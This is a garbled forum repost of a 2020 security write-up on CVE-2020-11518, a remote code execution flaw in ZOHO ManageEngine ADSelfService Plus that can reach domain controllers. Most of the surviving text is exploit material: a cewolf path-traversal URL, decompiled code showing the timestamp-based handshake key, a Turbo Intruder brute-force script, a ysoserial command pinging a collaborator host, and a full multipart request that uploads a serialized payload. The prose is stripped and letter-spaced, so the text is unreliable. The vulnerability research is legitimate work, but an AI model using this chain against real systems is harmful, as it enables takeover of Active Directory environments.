搜索

[15828] 2020-09-08_安全研究利用ZOHOADSelfServicePlus漏洞可进入域控活动目录

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2020-09-08_安全研究利用ZOHOADSelfServicePlus漏洞可进入域控活动目录   |   Z O H O   A D S e l f S e r v i c e   P l u s c l o u d s   F r e e B u f   2 0 2 0 - 0 9 - 0 8 Z O H O Z O H O   M a n a g e E n g i n e   A D S e l f S e r v i c e   P l u s 5 8 1 5 C V E - 2 0 2 0 - 1 1 5 1 8 A c t i v e   D i r e c t o r y A q u a t o n e Z O H O   M a n a g e E n g i n e A D S e l f S e r v i c e   P l u s Z O H O   M a n a g e E n g i n e   A D S e l f S e r v i c e   P l u s A c t i v e   D i r e c t o r y
Z O H O   M a n a g e E n g i n e   A D S e l f S e r v i c e   P l u s A c t i v e   D i r e c t o r y Z O H O   M a n a g e E n g i n e   A D S e l f S e r v i c e   P l u s 3 0 使 A D S e l f S e r v i c e   P l u s J A V A B y t e c o d e   V i e w e r A D S e l f S e r v i c e   P l u s J a v a w e b . x m l C e w o l f S e r v l e t Z O H O c e w o l f R C E i m g A D S e l f S e r v i c e   P l u s e v i l . f i l e h t t p : / / l o c a l h o s t : 8 8 8 8 / c e w o l f / ? i m g = / . . / . . / . . / p a t h / t o / e v i l . f i l e R C E A D S e l f S e r v i c e   P l u s e v i l . f i l e 访 A D S e l f S e r v i c e   P l u s D o m a i n   C o n t r o l l e r A c t i v e   D i r e c t o r y I S O A D S e l f S e r v i c e   P l u s < s e r v l e t - m a p p i n g > < s e r v l e t - n a m e > C e w o l f S e r v l e t < / s e r v l e t - n a m e > < u r l - p a t t e r n > / c e w o l f / * < / u r l - p a t t e r n > < / s e r v l e t - m a p p i n g >
A D S e l f S e r v i c e   P l u s A P I P O S T / L o g o n C u s t o m i z a t i o n . d o ? f o r m = s m a r t C a r d & o p e r a t i o n = A d d R C E 1 / L o g o n C u s t o m i z a t i o n . d o ? f o r m = s m a r t C a r d & o p e r a t i o n = A d d 2 R e s t A P I H A N D S H A K E _ K E Y / R e s t A P I / W C / S m a r t C a r d ? H A N D S H A K E _ K E Y = s e c r e t 3 A P I H A N D S H A K E _ K E Y S U C C E S S F A I L E D / s e r v l e t / H S K e y A u t h e n t i c a t o r ? P R O D U C T _ N A M E = M a n a g e E n g i n e + A D S e l f S e r v i c e + P l u s & H A N D S H A K E _ K E Y = s e c r e t 4 C : M a n a g e E n g i n e A D S e l f S e r v i c e   P l u s b i n 2 / R e s t A P I 访 H A N D S H A K E _ K E Y 3 / s e r v l e t / H S K e y A u t h e n t i c a t o r 访 A D S e l f S e r v i c e   P l u s g r e p J a v a P o s t g r e S Q L A P I
J a v a c o m . m a n a g e e n g i n e . a d s . f w . s e r v l e t H S K e y A u t h e n t i c a t o r . c l a s s J a v a c o m . m a n a g e e n g i n e . a d s . f w . a p i R e s t A P I K e y . c l a s s 2 1 2 0 1 0 0 0 = 1 2 0 0 0 0 2 1 0 0 0 使 B u r p I n t r u d e r p u b l i c   v o i d   d o P o s t ( H t t p S e r v l e t R e q u e s t   r e q u e s t ,   H t t p S e r v l e t R e s p o n s e   r e s p o n s e )   t h r o w s   S e r v l e t E x c e p t i o n ,   I O E x c e p t i o n   {             t r y   {                   S t r i n g   m e s s a g e   =   " F A I L E D " ;                   R e s t A P I K e y . g e t I n s t a n c e ( ) ;                   S t r i n g   a p i K e y   =   R e s t A P I K e y . g e t K e y ( ) ;                   S t r i n g   h a n d S h a k e K e y   =   r e q u e s t . g e t P a r a m e t e r ( " H A N D S H A K E _ K E Y " ) ;                   i f   ( h a n d S h a k e K e y . e q u a l s ( a p i K e y ) )   {                         m e s s a g e   =   " S U C C E S S " ;                   }                   P r i n t W r i t e r   o u t   =   r e s p o n s e . g e t W r i t e r ( ) ;                   r e s p o n s e . s e t C o n t e n t T y p e ( " t e x t / h t m l " ) ;                   o u t . p r i n t l n ( m e s s a g e ) ;                   o u t . c l o s e ( ) ;             }   c a t c h   ( E x c e p t i o n   v a r 7 )   {                   H S K e y A u t h e n t i c a t o r . o u t . l o g ( L e v e l . I N F O ,   "   " ,   v a r 7 ) ;             }       } R e s t A P I K e y . c l a s s p u b l i c   s t a t i c   v o i d   g e n e r a t e K e y ( )     {         L o n g   c T   =   L o n g . v a l u e O f ( S y s t e m . c u r r e n t T i m e M i l l i s ( ) ) ;         k e y   =   c T . t o S t r i n g ( ) ;         g e n e r a t e d T i m e   =   c T ;     }     p u b l i c   s t a t i c   S t r i n g   g e t K e y ( )     {         L o n g   c T   =   L o n g . v a l u e O f ( S y s t e m . c u r r e n t T i m e M i l l i s ( ) ) ;         i f   ( ( k e y   = =   n u l l )   | |   ( g e n e r a t e d T i m e . l o n g V a l u e ( )   +   1 2 0 0 0 0 L   <   c T . l o n g V a l u e ( ) ) )         {             g e n e r a t e K e y ( ) ;         }         r e t u r n   k e y ;     }
I n t r u d e r 线 怀 线 G E T J a v a c u r r e n t T i m e M i l l i s U T C T u r b o   I n t r u d e r r p s r p s / 2 H T T P b a s e . t x t T u r b o   I n t r u d e r i m p o r t   t i m e d e f   q u e u e R e q u e s t s ( t a r g e t ,   w o r d l i s t s ) :         e n g i n e   =   R e q u e s t E n g i n e ( e n d p o i n t = t a r g e t . e n d p o i n t ,                                               c o n c u r r e n t C o n n e c t i o n s = 2 0 ,                                               r e q u e s t s P e r C o n n e c t i o n = 2 0 0 ,                                               p i p e l i n e = T r u e ,                                               t i m e o u t = 2 ,                                               e n g i n e = E n g i n e . T H R E A D E D                                               )         e n g i n e . s t a r t ( )         r p s   =   4 0 0   #   t h i s   i s   a b o u t   t h e   n u m b e r   o f   r e q u e s t s   p e r   s e c o n d   I   c o u l d   g e n e r a t e   f r o m   m y   t e s t   s e r v e r ,   s o   n o t   q u i t e   t h e   i d e a l   1 0 0 0   p e r   s e c o n d         w h i l e   T r u e :                 n o w   =   i n t ( r o u n d ( t i m e . t i m e ( ) * 1 0 0 0 ) )                 f o r   i   i n   r a n g e ( n o w + ( r p s / 2 ) ,   n o w - ( r p s / 2 ) ,   - 1 ) :                         e n g i n e . q u e u e ( t a r g e t . r e q ,   s t r ( i ) ) d e f   h a n d l e R e s p o n s e ( r e q ,   i n t e r e s t i n g ) :         i f   ' S U C C E S S '   i n   r e q . r e s p o n s e :                 t a b l e . a d d ( r e q ) P O S T   / s e r v l e t / H S K e y A u t h e n t i c a t o r ? P R O D U C T _ N A M E = M a n a g e E n g i n e + A D S e l f S e r v i c e + P l u s & H A N D S H A K E _ K E Y = % s   H T T P / 1 . 1 H o s t :   l o c a l h o s t : 8 8 8 8 C o n t e n t - L e n g t h :   0 C o n n e c t i o n :   k e e p - a l i v e .
使 1 0 0 0 r p s 5 6 r p s y s o s e r i a l P a y l o a d P a y l o a d B u r p   I n t r u d e r y s o s e r i a l P a y l o a d p i e t e r . e v i l R e s t A P I e x p l o i t / c e w o l f / ? i m g = / . . / . . / . . / b i n / p i e t e r . e v i l G E T R C E b u g J a v a Z O H O   M a n a g e E n g i n e   A D S e l f S e r v i c e   P l u s R C E 广 V P N Z O H O 0 - d a y C V E - 2 0 2 0 - 1 1 5 1 8 2 0 2 0 . 3 . 2 6     2 0 2 0 . 3 . 3 0     2 0 2 0 . 3 . 3 1     2 0 2 0 . 4 . 2         Z O H O j a v a   - j a r   y s o s e r i a l - m a s t e r - S N A P S H O T . j a r   M o z i l l a R h i n o 1   " p i n g   p i n g - r c e - M o z i l l a R h i n o 1 . < y o u r - b u r p - c o l l a b o r a t o r > " P O S T   / R e s t A P I / W C / S m a r t C a r d ? m T C a l l = a d d S m a r t C a r d C o n f i g & P R O D U C T _ N A M E = M a n a g e E n g i n e + A D S e l f S e r v i c e + P l u s & H A N D S H A K E _ K E Y = 1 5 8 5 5 5 2 4 7 2 1 5 8   H T T P / 1 . 1 H o s t :   l o c a l h o s t : 8 8 8 C o n t e n t - L e n g t h :   2 4 6 4 C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y x k Q 2 P 0 9 d v b u V 1 P i 4 C o n n e c t i o n :   c l o s e - - - - - - W e b K i t F o r m B o u n d a r y x k Q 2 P 0 9 d v b u V 1 P i 4 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " C E R T I F I C A T E _ P A T H " ;   f i l e n a m e = " p i e t e r . e v i l " C o n t e n t - T y p e :   t e x t / x m l < b i n a r y - y s o s e r i a l - p a y l o a d - h e r e > - - - - - - W e b K i t F o r m B o u n d a r y x k Q 2 P 0 9 d v b u V 1 P i 4 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " C E R T I F I C A T E _ N A M E " b l a h - - - - - - W e b K i t F o r m B o u n d a r y x k Q 2 P 0 9 d v b u V 1 P i 4 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " S M A R T C A R D _ C O N F I G " { " S M A R T C A R D _ P R O D U C T _ L I S T " : " 4 " } - - - - - - W e b K i t F o r m B o u n d a r y x k Q 2 P 0 9 d v b u V 1 P i 4 - -
2 0 2 0 . 4 . 3         Z O H O 5 8 1 5 2 0 2 0 . 4 . 3         2 0 2 0 . 4 . 1 2     h o n o k i
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理